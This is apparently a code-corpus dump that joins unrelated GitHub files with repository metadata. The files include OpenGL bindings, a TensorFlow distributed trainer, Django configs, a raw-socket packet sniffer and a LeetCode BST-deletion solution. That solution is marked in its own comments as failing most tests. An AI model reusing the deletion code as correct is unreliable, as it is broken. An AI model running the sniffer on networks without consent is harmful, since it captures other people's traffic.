GLX_RENDERER_DEVICE_ID_MESA=_C('GLX_RENDERER_DEVICE_ID_MESA',0x8184)
GLX_RENDERER_OPENGL_COMPATIBILITY_PROFILE_VERSION_MESA=_C('GLX_RENDERER_OPENGL_COMPATIBILITY_PROFILE_VERSION_MESA',0x818B)
GLX_RENDERER_OPENGL_CORE_PROFILE_VERSION_MESA=_C('GLX_RENDERER_OPENGL_CORE_PROFILE_VERSION_MESA',0x818A)
GLX_RENDERER_OPENGL_ES2_PROFILE_VERSION_MESA=_C('GLX_RENDERER_OPENGL_ES2_PROFILE_VERSION_MESA',0x818D)
GLX_RENDERER_OPENGL_ES_PROFILE_VERSION_MESA=_C('GLX_RENDERER_OPENGL_ES_PROFILE_VERSION_MESA',0x818C)
GLX_RENDERER_PREFERRED_PROFILE_MESA=_C('GLX_RENDERER_PREFERRED_PROFILE_MESA',0x8189)
GLX_RENDERER_UNIFIED_MEMORY_ARCHITECTURE_MESA=_C('GLX_RENDERER_UNIFIED_MEMORY_ARCHITECTURE_MESA',0x8188)
GLX_RENDERER_VENDOR_ID_MESA=_C('GLX_RENDERER_VENDOR_ID_MESA',0x8183)
GLX_RENDERER_VERSION_MESA=_C('GLX_RENDERER_VERSION_MESA',0x8185)
GLX_RENDERER_VIDEO_MEMORY_MESA=_C('GLX_RENDERER_VIDEO_MEMORY_MESA',0x8187)
@_f
@_p.types(_cs.Bool,_cs.c_int,ctypes.POINTER(_cs.c_uint))
def glXQueryCurrentRendererIntegerMESA(attribute,value):pass
@_f
@_p.types(ctypes.c_char_p,_cs.c_int)
def glXQueryCurrentRendererStringMESA(attribute):pass
@_f
@_p.types(_cs.Bool,ctypes.POINTER(_cs.Display),_cs.c_int,_cs.c_int,_cs.c_int,ctypes.POINTER(_cs.c_uint))
def glXQueryRendererIntegerMESA(dpy,screen,renderer,attribute,value):pass
@_f
@_p.types(ctypes.c_char_p,ctypes.POINTER(_cs.Display),_cs.c_int,_cs.c_int,_cs.c_int)
def glXQueryRendererStringMESA(dpy,screen,renderer,attribute):pass
| [
"justin.sostmann@googlemail.com"
] | justin.sostmann@googlemail.com |
b28006b857c0c0978a02ab65f50d97a71850347d | aaa3626b896d29d4713f7a780580ed29e0bb4ed1 | /leetcode/medium/Trees/DeleteNode.py | 9f0c53c49c150f2a58cba06d2909352351b11f64 | [
"MIT"
] | permissive | rohan8594/DS-Algos | 1c59944cfffddf113a8806f138df285818b58dfe | 889bde40bfcd4a4f25f889355f9c5a83b9ead7d7 | refs/heads/master | 2021-06-25T14:37:55.469940 | 2020-10-17T20:41:34 | 2020-10-17T20:41:34 | 150,487,058 | 3 | 21 | MIT | 2020-10-23T17:19:00 | 2018-09-26T20:36:39 | Python | UTF-8 | Python | false | false | 2,108 | py | # Given a root node reference of a BST and a key, delete the node with the given key in the BST. Return the root node reference (possibly updated) of the BST.
# Basically, the deletion can be divided into two stages:
# Search for a node to remove.
# If the node is found, delete the node.
# Note: Time complexity should be O(height of tree).
# Example:
# root = [5,3,6,2,4,null,7]
# key = 3
# 5
# / \
# 3 6
# / \ \
# 2 4 7
# Given key to delete is 3. So we find the node with value 3 and delete it.
# One valid answer is [5,4,6,2,null,null,7].
# Another valid answer is [5,2,6,null,4,null,7], shown in the following BST.
# 5
# / \
# 2 6
# \ \
# 4 7
# NOTE: Only 48 / 85 test cases passing. Check leetcode or J Portilla's soln for correct soln.
class TreeNode:
def __init__(self, x):
self.val = x
self.left = None
self.right = None
class Solution:
def deleteNode(self, root: TreeNode, key: int) -> TreeNode:
if not root:
return None
if root.val == key:
temp = root.right
root = root.left
if root:
if root.right:
root.right.right = temp
else:
root.right = temp
return root
node = root
while node:
prev = node
if node.val > key:
node = node.left
elif node.val < key:
node = node.right
if not node:
continue
if node.val == key:
temp = node.right
node = node.left
if prev.left:
if prev.left.val == key:
prev.left = node
elif prev.right:
if prev.right.val == key:
prev.right = node
if node:
if node.right:
node.right.right = temp
else:
node.right = temp
break
return root
| [
"rohan.8594@gmail.com"
] | rohan.8594@gmail.com |
3f402389ba3b8f59adf8aa8a4a3ef302e9c08adf | 0ab2cdbef3864c74f455d3911caf6c6acc3223d2 | /tensorflow/cifar/cifar10_dist_train.py | f5fa95048452a59baedcf04c169af14a886c797f | [
"MIT"
] | permissive | lanhin/learn | efc5b66fd40201c0bad5d464166bc1cd2881eaea | 053a26c7c6462725546eb3dc1d09734c66895559 | refs/heads/master | 2021-01-01T04:01:38.119445 | 2017-09-14T09:24:16 | 2017-09-14T09:24:16 | 97,101,168 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,485 | py | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""A binary to train CIFAR-10 using a single GPU.
Accuracy:
cifar10_train.py achieves ~86% accuracy after 100K steps (256 epochs of
data) as judged by cifar10_eval.py.
Speed: With batch_size 128.
System | Step Time (sec/batch) | Accuracy
------------------------------------------------------------------
1 Tesla K20m | 0.35-0.60 | ~86% at 60K steps (5 hours)
1 Tesla K40m | 0.25-0.35 | ~86% at 100K steps (4 hours)
Usage:
Please see the tutorial and website for how to download the CIFAR-10
data set, compile the program and train the model.
http://tensorflow.org/tutorials/deep_cnn/
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from datetime import datetime
import time
import tensorflow as tf
from tensorflow.python.client import timeline
from keras import datasets as dset
import numpy as np
import cifar10
import os
FLAGS = tf.app.flags.FLAGS
tf.app.flags.DEFINE_string('train_dir', '/tmp/cifar10_train',
"""Directory where to write event logs """
"""and checkpoint.""")
tf.app.flags.DEFINE_integer('max_steps', 390*250,
"""Number of batches to run.""")
tf.app.flags.DEFINE_boolean('log_device_placement', False,
"""Whether to log device placement.""")
tf.app.flags.DEFINE_integer('log_frequency', 30,
"""How often to log results to the console.""")
#lanhin
tf.app.flags.DEFINE_integer("task_index", None,
"Worker task index, should be >= 0. task_index=0 is "
"the master worker task the performs the variable "
"initialization ")
tf.app.flags.DEFINE_integer("num_gpus", 0,
"Total number of gpus for each machine."
"If you don't use GPU, please set it to '0'")
tf.app.flags.DEFINE_string("ps_hosts","localhost:2222",
"Comma-separated list of hostname:port pairs")
tf.app.flags.DEFINE_string("worker_hosts", "localhost:2223,localhost:2224",
"Comma-separated list of hostname:port pairs")
tf.app.flags.DEFINE_string("job_name", None,"job name: worker or ps")
tf.app.flags.DEFINE_integer("tau", 2, "The Tau value")
if FLAGS.job_name == "ps":
os.environ["CUDA_VISIBLE_DEVICES"]=''
#elif FLAGS.task_index == 0:
# os.environ["CUDA_VISIBLE_DEVICES"]='0'
#else:
# os.environ["CUDA_VISIBLE_DEVICES"]='1'
alpha = 0.1
EPOCH_SIZE = cifar10.NUM_EXAMPLES_PER_EPOCH_FOR_TRAIN
NUM_LABELS = cifar10.NUM_CLASSES
#lanhin end
def normalize(X_train,X_test):
#this function normalize inputs for zero mean and unit variance
# it is used when training a model.
# Input: training set and test set
# Output: normalized training set and test set according to the trianing set statistics.
mean = np.mean(X_train,axis=(0,1,2,3))
std = np.std(X_train, axis=(0, 1, 2, 3))
X_train = (X_train-mean)/(std+1e-7)
X_test = (X_test-mean)/(std+1e-7)
return X_train, X_test
def softmax(x):
"""Compute softmax values for each sets of scores in x."""
e_x = np.exp(x - np.max(x))
return e_x / e_x.sum() # may this can fix the exp() overflow problem. --lanhin
#return np.exp(x) / np.sum(np.exp(x), axis=0)
def predt(sess, x_test, y_test, logits, x, y):
size = x_test.shape[0]
predictions = np.ndarray(shape=(size, NUM_LABELS), dtype=np.float32)
for begin in xrange(0, size, FLAGS.batch_size):
end = begin + FLAGS.batch_size
if end <= size:
predictions[begin:end, :] = sess.run(
logits,
feed_dict={x: x_test[begin:end, ...], y: y_test[begin:end]})
else:
batch_predictions = sess.run(
logits,
feed_dict={x: x_test[-FLAGS.batch_size:, ...], y: y_test[-FLAGS.batch_size:]})
predictions[begin:, :] = batch_predictions[begin - size:, :]
correct = 0
pred = []
for item in predictions:
pred.append(np.argmax(softmax(item)))
for i in range(len(pred)):
# print ("i=", i)
# print ("pred and y_test:", pred[i], y_test[i][0])
if pred[i] == y_test[i]:
correct += 1
acc = (1.0000 * correct / predictions.shape[0])
print ("acc:", acc)
def train():
"""Train CIFAR-10 for a number of steps."""
#lanhin
#Construct the cluster and start the server
ps_spec = FLAGS.ps_hosts.split(",")
worker_spec = FLAGS.worker_hosts.split(",")
# Get the number of workers.
num_workers = len(worker_spec)
cluster = tf.train.ClusterSpec({
"ps": ps_spec,
"worker": worker_spec})
server = tf.train.Server(
cluster, job_name=FLAGS.job_name, task_index=FLAGS.task_index)
if FLAGS.job_name == "ps":
server.join()
# only worker will do train()
is_chief = False
if FLAGS.task_index == 0:
is_chief = True
#lanhin end
#with tf.Graph().as_default():
# Use comment to choose which way of tf.device() you want to use
#with tf.Graph().as_default(), tf.device(tf.train.replica_device_setter(
# worker_device="/job:worker/task:%d" % FLAGS.task_index,
# cluster=cluster)):
with tf.device("job:worker/task:%d" % FLAGS.task_index):
global_step = tf.contrib.framework.get_or_create_global_step()
# Get images and labels for CIFAR-10.
# Force input pipeline to CPU:0 to avoid operations sometimes ending up on
# GPU and resulting in a slow down.
#with tf.device('/cpu:0'):
images, labels = cifar10.distorted_inputs()
(x_train, y_train_orl), (x_test, y_test_orl) = dset.cifar10.load_data()
x_train = x_train.astype('float32')
x_test = x_test.astype('float32')
x_train, x_test = normalize(x_train, x_test)
y_train_orl = y_train_orl.astype('int32')
y_test_orl = y_test_orl.astype('int32')
y_train_flt = y_train_orl.ravel()
y_test_flt = y_test_orl.ravel()
x = tf.placeholder(tf.float32, shape=(FLAGS.batch_size, 32,32,3))
y = tf.placeholder(tf.int32, shape=(FLAGS.batch_size,))
# Build a Graph that computes the logits predictions from the
# inference model.
#logits, local_var_list = cifar10.inference(images)
logits, local_var_list = cifar10.inference(x)
# Calculate loss.
#loss = cifar10.loss(logits, labels)
loss = cifar10.loss(logits, y)
# Build a Graph that trains the model with one batch of examples and
# updates the model parameters.
train_op = cifar10.train(loss, global_step)
# the temp var part, for performance testing
tmp_var_list = []
var_index = 0
for var in local_var_list:
var_index += 1
tmp_var_list.append(tf.Variable(tf.zeros(var.shape), name="tmp_var"+str(var_index)))
# the non chief workers get local var init_op here
if not is_chief:
init_op = tf.global_variables_initializer()
else:
init_op = None
# start global variables region
global_var_list = []
with tf.device("/job:ps/replica:0/task:0/cpu:0"):
# barrier var
finished = tf.get_variable("worker_finished",[],tf.int32,tf.zeros_initializer(tf.int32),trainable=False)
with finished.graph.colocate_with(finished):
finish_op = finished.assign_add(1,use_locking=True)
var_index = 0
for var in local_var_list:
var_index += 1
global_var_list.append(tf.Variable(tf.zeros(var.shape), name="glo_var"+str(var_index)))
def assign_global_vars(): # assign local vars' values to global vars
return [gvar.assign(lvar) for (gvar, lvar) in zip(global_var_list, local_var_list)]
def assign_local_vars(): # assign global vars' values to local vars
return [lvar.assign(gvar) for (gvar, lvar) in zip(global_var_list, local_var_list)]
def assign_tmp_vars(): # assign local vars' values to tmp vars
return [tvar.assign(lvar) for (tvar, lvar) in zip(tmp_var_list, local_var_list)]
def assign_local_vars_from_tmp(): # assign tmp vars' values to local vars
return [lvar.assign(tvar) for (tvar, lvar) in zip(tmp_var_list, local_var_list)]
def update_before_train(alpha, w, global_w):
varib = alpha*(w-global_w)
gvar_op = global_w.assign(global_w + varib)
return gvar_op, varib
def update_after_train(w, vab):
return w.assign(w-vab)
assign_list_local = assign_local_vars()
assign_list_global = assign_global_vars()
assign_list_loc2tmp = assign_tmp_vars()
assign_list_tmp2loc = assign_local_vars_from_tmp()
before_op_tuple_list = []
after_op_tuple_list = []
vbholder_list = []
for (gvar, lvar) in zip(global_var_list, local_var_list):
before_op_tuple_list.append((update_before_train(alpha, lvar, gvar)))
for var in local_var_list:
vbholder_list.append(tf.placeholder("float", var.shape))
after_op_tuple_list.append((update_after_train(var, vbholder_list[-1]), vbholder_list[-1]))
# the chief worker get global var init op here
if is_chief:
init_op = tf.global_variables_initializer()
# global variables region end
#lanhin start
sv = tf.train.Supervisor(
is_chief=True,#is_chief,
logdir=FLAGS.train_dir,
init_op=init_op,
#local_init_op=loc_init_op,
recovery_wait_secs=1)
#global_step=global_step)
sess_config = tf.ConfigProto(
allow_soft_placement=True,
log_device_placement=FLAGS.log_device_placement,
device_filters=["/job:ps", "/job:worker/task:%d" % FLAGS.task_index])
# The chief worker (task_index==0) session will prepare the session,
# while the remaining workers will wait for the preparation to complete.
if is_chief:
print("Worker %d: Initializing session..." % FLAGS.task_index)
else:
print("Worker %d: Waiting for session to be initialized..." %
FLAGS.task_index)
sess = sv.prepare_or_wait_for_session(server.target, config=sess_config)
if is_chief:
sess.run(assign_list_global)
barrier_finished = sess.run(finish_op)
print ("barrier_finished:", barrier_finished)
else:
barrier_finished = sess.run(finish_op)
print ("barrier_finished:", barrier_finished)
while barrier_finished < num_workers:
time.sleep(1)
barrier_finished = sess.run(finished)
sess.run(assign_list_local)
print("Worker %d: Session initialization complete." % FLAGS.task_index)
# lanhin end
#sess = tf.Session()
#sess.run(init_op)
#tf.train.start_queue_runners(sess)
f = open('tl_dist.json', 'w')
run_options = tf.RunOptions(trace_level=tf.RunOptions.FULL_TRACE)
run_metadata = tf.RunMetadata()
time_begin = time.time()
# while not mon_sess.should_stop():
# mon_sess.run(train_op)
for step in range(FLAGS.max_steps):
offset = (step * FLAGS.batch_size) % (EPOCH_SIZE - FLAGS.batch_size)
x_data = x_train[offset:(offset + FLAGS.batch_size), ...]
y_data_flt = y_train_flt[offset:(offset + FLAGS.batch_size)]
if step % FLAGS.log_frequency == 0:
time_step = time.time()
steps_time = time_step - time_begin
print ("step:", step, " steps time:", steps_time, end=' ')
sess.run(assign_list_loc2tmp)
sess.run(assign_list_local)
predt(sess, x_test, y_test_flt, logits, x, y)
sess.run(assign_list_tmp2loc)
time_begin = time.time()
if step % FLAGS.tau == 0 and step > 0: # update global weights
thevarib_list = []
for i in range(0, len(before_op_tuple_list)):
(gvar_op, varib) = before_op_tuple_list[i]
_, thevarib = sess.run([gvar_op, varib])
thevarib_list.append(thevarib)
sess.run(train_op, feed_dict={x:x_data, y:y_data_flt})
for i in range(0, len(after_op_tuple_list)):
(lvar_op, thevaribHolder) = after_op_tuple_list[i]
sess.run(lvar_op, feed_dict={thevaribHolder: thevarib_list[i]})
else:
sess.run(train_op, feed_dict={x:x_data, y:y_data_flt})#, options=run_options, run_metadata=run_metadata)
#tl = timeline.Timeline(run_metadata.step_stats)
#ctf = tl.generate_chrome_trace_format()
#f.write(ctf)
time_end = time.time()
training_time = time_end - time_begin
print("Training elapsed time: %f s" % training_time)
f.close()
sess.run(assign_list_local)
predt(sess, x_test, y_test_flt, logits, x, y)
def main(argv=None): # pylint: disable=unused-argument
cifar10.maybe_download_and_extract()
if tf.gfile.Exists(FLAGS.train_dir):
tf.gfile.DeleteRecursively(FLAGS.train_dir)
tf.gfile.MakeDirs(FLAGS.train_dir)
train()
if __name__ == '__main__':
tf.app.run()
| [
"lanhin1@gmail.com"
] | lanhin1@gmail.com |
151c76c81dfa1c2b7f7c3c7aae40575f32036853 | 6f4c3966317577488aad949dce8c57f18b55df3a | /spec/metrics/src/counter.py | 38f8385dbc8b6138b7a07ac980bb2c98d8b12651 | [
"Apache-2.0"
] | permissive | tikal-fuseday/python-microprofile | 1f78c72ced27a03670b7d1c3408895ecdeaf4b59 | 3700db5ca0be6a31df7d8aac8a523f9199484e76 | refs/heads/master | 2023-05-13T12:30:29.493762 | 2020-02-23T15:40:11 | 2020-02-23T15:40:11 | 240,019,270 | 10 | 1 | Apache-2.0 | 2023-05-01T21:20:50 | 2020-02-12T13:26:44 | Python | UTF-8 | Python | false | false | 297 | py | from spec.metrics.src.metric import Metric
class Counter(Metric):
def __init__(self, *args, **kwargs):
super(Counter, self).__init__(*args, **kwargs)
self._counter = 0
def inc(self, n=1):
self._counter += n
def get_count(self):
return self._counter
| [
"nir@myhippo.com"
] | nir@myhippo.com |
fc4030697b74d0346388831c2bebbd1f2b35f932 | c7ad12038ca73d999e3f99e090e9233a435c0156 | /Project.py | 2a31b769adfb69357fe0e6f2519a869b44d2284e | [
"MIT"
] | permissive | Akohlert/Anders | c0a022e98d71194502f33c5182b5f44f8f9cebae | 1bbfbd9bd1c13caf2dfcf22685c3587896072956 | refs/heads/master | 2020-04-28T18:30:21.954185 | 2019-04-02T12:40:46 | 2019-04-02T12:40:46 | 175,480,750 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 200 | py | {
"folders": [
{
"path": "C:\\Users\\ander\\Desktop\\Microsoft VS Code"
},
{
"name": "Anders-1",
"path": "C:\\Users\\ander\\OneDrive\\Polit\\Python\\Anders-1"
}
],
"settings": {}
} | [
"jqs310@alumni.ku.dk"
] | jqs310@alumni.ku.dk |
a585065a3adc8bc699bf8ba1c78b67358d1ea23c | c99c272181eb43df688cc6af10bfb17659014ab9 | /03_ОOP-Python/01-Defining Classes/02_Exercise/07_GuildSystem/project/venv/Scripts/easy_install-script.py | 479119ad1bbdbfaf2e56c4f7f55eb619444da6c2 | [] | no_license | LachezarKostov/SoftUni | ce89d11a4796c10c8975dc5c090edecac993cb03 | 47559e9f01f7aabd73d84aa175be37140e2d5621 | refs/heads/master | 2023-01-29T20:49:57.196136 | 2020-12-10T12:34:09 | 2020-12-10T12:34:09 | 283,491,508 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 508 | py | #!"C:\Users\dream\Desktop\Python\OP-Python\01-Defining Classes\02_Exercise\07_GuildSystem\project\venv\Scripts\python.exe"
# EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==40.8.0','console_scripts','easy_install'
__requires__ = 'setuptools==40.8.0'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('setuptools==40.8.0', 'console_scripts', 'easy_install')()
)
| [
"68952160+LachezarKostov@users.noreply.github.com"
] | 68952160+LachezarKostov@users.noreply.github.com |
d1ebae2ff87d5d64981c34e8feeae8da2eea7ed8 | 0606f10b1592a1b6c07f074834f9d9edc942cdb2 | /eventus2/urls.py | d8ff6ba71db37b144c52f920f20e0e82c3ef1e2a | [] | no_license | anderson383/Projecto-Curso-de-eventos-django | 4f27ccde5039aaec9f6ba6c002bc3a1ee715934f | b4d71a4dbe7a27cb66f238a255f03842d609459f | refs/heads/master | 2020-12-15T04:51:47.972117 | 2020-01-20T01:57:49 | 2020-01-20T01:57:49 | 234,999,670 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 844 | py | """eventus2 URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
urlpatterns = [
path("", include("apps.events.urls")),
path("", include("apps.users.urls")),
path('admin/', admin.site.urls),
]
| [
"andersonvargas@gmail.com"
] | andersonvargas@gmail.com |
ee4500bd527888108aa19986070fb4c9cbd8d6a6 | e5c353d9ca1cd39e0bfabc79e064a36187d7ccff | /virtnic.py | 5797f70e692dc15df6698a99d1b02359d8a2c955 | [] | no_license | sir-ragna/packetsniffer | 91f88c0d01c23c39007d9db5da0911bbe1e361cd | cf2ec741a617789f9b72234937d86832942575b4 | refs/heads/master | 2021-01-22T09:58:20.729807 | 2015-09-06T20:41:51 | 2015-09-06T20:41:51 | 35,232,405 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,377 | py | __author__ = 'Robbe Van der Gucht'
from random import choice
import socket
import sys
import logging
import internet
from data import init_datastore, save_packet
import atexit
# Set up logger
log_file = 'virtnic.log'
logging.basicConfig(filename=log_file,
level=logging.DEBUG,
format='%(levelname)s:%(asctime)s:%(message)s')
logger = logging.getLogger(__name__)
@atexit.register
def check_logs():
print("\nCheck log file %s for errors" % log_file)
class NetworkInterface:
def get_mac_bytes(self):
return b''.join([s.decode('hex') for s in self.mac_address.split(':')])
def get_mac_str(self):
return self.mac_address
def __init__(self, mac_address=None):
if mac_address is None:
self.mac_address = ''.join([choice(list("0123456789ABCDEF")) if a == 'X' else a for a in list("XX:XX:XX:XX:XX:XX")])
else:
self.mac_address = mac_address
def start_listening(self, datastore_file='packets.dat'):
"""Listen for incoming traffic"""
try:
s = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.ntohs(0x0003))
# socket.ntohs converts bytes from little endian(intel) to big endian(network)
init_datastore(datastore_file)
except socket.error, msg:
logging.critical("Socket could not be created. Error Code: %s Message: %s", str(msg[0]), str(msg[1]))
sys.exit(1)
try:
while 1:
unit = s.recvfrom(65565)[0]
# ^
# 65,535 <= max length of IPv4 packet
# + ethernet frame header
logging.debug("TOTAL ETHERNET FRAME LENGTH: %d", len(unit))
try:
ethframe = internet.EthernetFrame(unit)
save_packet(ethframe, datastore_file)
except internet.Unimplemented as err:
logging.warning(err.msg)
except internet.ErrorInvalidDatagram as err:
logging.error(err.msg)
print(str(ethframe))
except KeyboardInterrupt:
logging.info("Keyboard interrupt received")
try:
s.close()
except socket.error:
logging.warning("Closing socket failed")
logging.info("Stopping program")
def __str__(self):
s = "Network Interface\n"
s += "Hardware address: %s" % self.mac_address
return s
vnic = NetworkInterface()
vnic.start_listening() | [
"robbe.vandergucht@gmail.com"
] | robbe.vandergucht@gmail.com |
1e432e96dd1aaeb5d8842e0cb6caf89568d4ed58 | f4550e1553011d8a04ab484ec48472341141557f | /pycircuit/circuit/examples/mos_cir_with_caps.py | cf632bfffb1504cefb701d70da18ea8adf76c296 | [] | no_license | henjo/pycircuit | 6c9159f32bac19a3a7e93dc798a471fe283c4f70 | 20eb79fd05bd7903f7033b41ad8a1b106e99d9e3 | refs/heads/master | 2023-07-11T23:44:53.390939 | 2019-08-23T06:30:53 | 2019-08-23T06:30:53 | 79,107 | 32 | 15 | null | 2012-10-06T15:51:54 | 2008-11-21T14:31:45 | Python | UTF-8 | Python | false | false | 900 | py | #This code finds the gain of a CS stage, now considering the intrinsic MOS capacitantes. The results is the same as in the book Design Analog CMOS Integrated Circuits, by Behzad Razavi - pg 174.
from sympy import *
from pycircuit.circuit import *
from pycircuit.circuit import mos
c=SubCircuit(toolkit=symbolic)
inp=c.add_node('inp')
inp1=c.add_node('inp1')
out=c.add_node('out')
vdd=c.add_node('vdd')
var('R_L,R_S,gm1,gmb1,ro1,Cgs1,Cgd1,Cdb1,s')
c['VDD']=VS(vdd,gnd,v=5,vac=0)
c['R_L']=R(vdd,out,r=R_L)
c['R_S']=R(inp,inp1,r=R_S)
c['Vin']=VS(inp,gnd,v=1,vac=1)
c['M1']=mos.MOS(inp1,out,gnd,gnd,gm=gm1,gds=0,gmb=0,Cgs=Cgs1,Cgd=Cgd1,Cdb=Cdb1,toolkit=symbolic)
ac=AC(c)
res=ac.solve(s,complexfreq=True)
gain=simplify(res.v('out')/res.v('inp'))
print "\nThe transfer function of the CS stage is:"
sympy.pprint(gain)
print "\nShowing the denominator as polynomial:"
sympy.pprint(denom(gain).as_poly(s))
| [
"taimurgibran@gmail.com"
] | taimurgibran@gmail.com |
55814cb8008d618e84f59cc9762bb4f0cc9db4a6 | 422d74fb18cd1104b659f64ff800b1577b3f5b6e | /ingest.py | c036437b906b4b2fe7101b350359d57303a765fd | [
"Apache-2.0"
] | permissive | nOkuda/bert-experiments | 60be7a23b81156a4f4c573789c56da3c77efdb27 | 596928c682d678243bcf80a7ce348066b4ea5f2f | refs/heads/main | 2023-08-02T20:15:45.136476 | 2021-09-21T23:35:41 | 2021-09-21T23:35:41 | 408,950,157 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 915 | py | import time
from pathlib import Path
from lasearch.db import FlatFileDatabase
from lasearch.latinbert import LatinBERT
def _main():
bert_model = LatinBERT(
tokenizerPath=
'latin-bert/models/subword_tokenizer_latin/latin.subword.encoder',
bertPath='latin-bert/models/latin_bert')
db = FlatFileDatabase(db_dir=Path('flatdb'))
latin_tess_files_dir = Path('data')
aeneid_path = latin_tess_files_dir / 'vergil.aeneid.tess'
lucan1_path = latin_tess_files_dir / 'lucan.bellum_civile.part.1.tess'
_timed_ingest(db, aeneid_path, bert_model, 'Aeneid ingest time:')
_timed_ingest(db, lucan1_path, bert_model, 'Lucan 1 ingest times:')
def _timed_ingest(db, tessfile_path, bert_model, message):
start = time.time()
db.ingest(tessfile_path, bert_model)
ingest_time = time.time() - start
print(message, ingest_time)
if __name__ == '__main__':
_main()
| [
"Nozomu.Okuda@gmail.com"
] | Nozomu.Okuda@gmail.com |
a69ceceda28fd5ed8c05c28ec9f3daf2a56da56b | 0c62fdc906585b121e7b2a43341cdcb8db75e9d5 | /pinax_theme_bootstrap/__init__.py | 5dc043e0d01aef149dda7a8d34124a78a1fd9cf0 | [] | no_license | Magnatelabs/Magnate-Application | c4b0eb97b64db848af250766a518257780cdfdb7 | b80a076ad2e0e77edad04ea15d63fa673ec83078 | refs/heads/master | 2021-03-27T09:27:04.740953 | 2015-03-13T15:26:35 | 2015-03-13T15:26:35 | 12,013,196 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 22 | py | __version__ = "3.0a9"
| [
"jolumwilliams@gmail.com"
] | jolumwilliams@gmail.com |
085d5c0515c864914b616949c2a075f8d94e18cb | c1adccd2dfdc2407ffc1eb729c817f0a09c32575 | /bathroomapp/admin.py | b1ab1e066e153472bc4f891b7243f193b9c52eae | [] | no_license | elmwoodtim/cbs-centralbathroomsolution | a7e6131b3f36bfeb0985d02fea8744e1acb083fa | e68f765a9ff9d9a22e58fe01069711825055a54c | refs/heads/master | 2022-12-10T23:56:08.197281 | 2020-01-25T19:01:24 | 2020-01-25T19:01:24 | 235,666,184 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 212 | py | from django.contrib import admin
from bathroomapp.models import AppUser, Packages, Bathroom
# Register your models here.
admin.site.register(AppUser)
admin.site.register(Packages)
admin.site.register(Bathroom)
| [
"timlim@Tims-MacBook-Air.local"
] | timlim@Tims-MacBook-Air.local |
2b888880982db9b582df2d6ba9d04acf17ecbc83 | f9c9494b229218c9d6748f69ee5a685aa47642e3 | /py1/0330/0330-2.py | 1a39cf0458e7711647354fe16a19d0c7680c13e5 | [] | no_license | leleluv1122/Python | 5993db39cdaa773378d735c0db8df42372b8df09 | b2b46931baad7ce5da7a7816354a0cf3ffa3acc7 | refs/heads/master | 2021-03-26T09:41:38.174962 | 2020-06-28T05:51:31 | 2020-06-28T05:51:31 | 247,693,357 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 773 | py | import math
x1, y1, x2, y2, x3, y3 = eval(input("Enter six coordinates of three points "
"separated by commas like x1, y1, x2, y2, x3, y3: "))
# 각 변의 길이 구하고,
a = math.sqrt((x2 - x3) * (x2 - x3) + (y2 - y3) * (y2 - y3))
b = math.sqrt((x1 - x3) * (x1 - x3) + (y1 - y3) * (y1 - y3))
c = math.sqrt((x1 - x2) * (x1 - x2) + (y1 - y2) * (y1 - y2))
# acos로 각도를 구하고(radian) 이걸 math.degrees로 바꿔준다
A = math.degrees(math.acos((a*a-b*b-c*c) / (-2*b*c)))
B = math.degrees(math.acos((b*b-a*a-c*c) / (-2*a*c)))
C = math.degrees(math.acos((c*c-b*b-a*a) / (-2*a*b)))
# 소숫점 2번째 자리까지 구하려고 ...
print("The three angles are ", round(A * 100) / 100.0,
round(B * 100) / 100.0, round(C*100) / 100.0) | [
"jh_o214@naver.com"
] | jh_o214@naver.com |
8e8e39e2fc6905770a6ab02ad717fa151d1404f6 | 820c31e0ad953e71d19a3062ff68606e234ba647 | /IP_Sync/ip_Sync.py | 6db96460082f779fae6d2f66c946e03d63d82e58 | [
"MIT"
] | permissive | wemecan/czipdata | ce15e63509874f3f89414c079774fe94c4bc335d | ee382832cf8506cc473e4a4cc9ece24abc9d99a1 | refs/heads/main | 2023-01-24T08:09:30.985568 | 2020-11-24T03:48:37 | 2020-11-24T03:48:37 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,382 | py | # -*- encoding: utf-8 -*-
'''
@Description: :实现纯真IP数据库的下载和更新.
@Date :2020/11/03 13:27:05
@Author :a76yyyy
@version :1.0
'''
import sys,os
sys.path.append(os.path.abspath(os.path.dirname(__file__)))
sys.path.append(os.path.abspath(os.path.dirname(os.path.dirname(__file__))))
import ipUpdate
import dat2txt
from database import mysql_Database
from configs import config,default_dat_update
from dat2mysql import dat2mysql
from collegeUpdate import collegeUpdate
from convert import convert
from file_set import file_set
tmp_dir = os.path.abspath(os.path.dirname(__file__)+os.path.sep+"tmp")
file_set(tmp_dir,'dir')
data_dir = os.path.abspath(os.path.dirname(os.path.dirname(__file__))+os.path.sep+"data")
file_set(data_dir,'dir')
def down(filename= None):
"""
@description :从纯真网络(cz88.net)导入qqwry.dat至指定dat格式文件名.
---------
@param :filename : 输出纯真IP数据库的dat文件名或路径,默认为"../data/czipdata.dat".
-------
@Returns :None
-------
"""
varlist = []
if filename == None:
